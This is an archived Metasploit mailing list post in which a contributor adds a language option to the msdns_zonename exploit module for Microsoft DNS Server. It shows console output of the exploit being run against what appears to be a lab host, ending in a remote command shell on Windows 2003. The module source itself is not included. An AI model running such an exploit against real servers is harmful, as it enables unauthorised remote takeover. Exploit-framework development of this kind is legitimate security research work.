Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

msdns_zonename (rev 4711)

From: fab at revhosts.net (Fabrice MOURRON)
Date: Fri, 20 Apr 2007 00:46:14 +0200
With the last release of this module, I had some pain to found an  
easiest way to implement the french targets with the automatic mode.

So, I add a new OptString to select the country language and I add  
some conditions.

It's not very sexy, but it's an easiest way to implement the next  
targets for others languages ;-)


msf exploit(msdns_zonename) > show options

Module options:

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    Language  English           no        Language for automatic  
target: English, French
    RHOST     192.168.0.200    yes       The target address
    RPORT     0                yes       The target port


Payload options:

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique: seh, thread,  
process
    LPORT     4444             yes       The local port


Exploit target:

    Id  Name
    --  ----
    0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

msf exploit(msdns_zonename) > set Language French
Language => French
msf exploit(msdns_zonename) > rexploit
[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 2189
[*] Connecting to the endpoint mapper service...
[*] Detected a Windows 2003 SP1-SP2 target...
[*] Trying target Windows 2003 Server SP1-SP2 French...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 
192.168.0.200[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 
192.168.0.200[0] ...
[*] Sending exploit...
[*] Sending stage (474 bytes)
[*] Error: no response from dcerpc service
[*] Command shell session 4 opened (192.168.0.2:50275 ->  
192.168.0.200:4444)

Microsoft Windows [version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: msdns_zonename.rb
Type: text/x-ruby-script
Size: 7813 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070420/9387ee29/attachment.bin>
-------------- next part --------------




@+

Fab
Previous By Date Next
Previous By Thread Next

Current thread: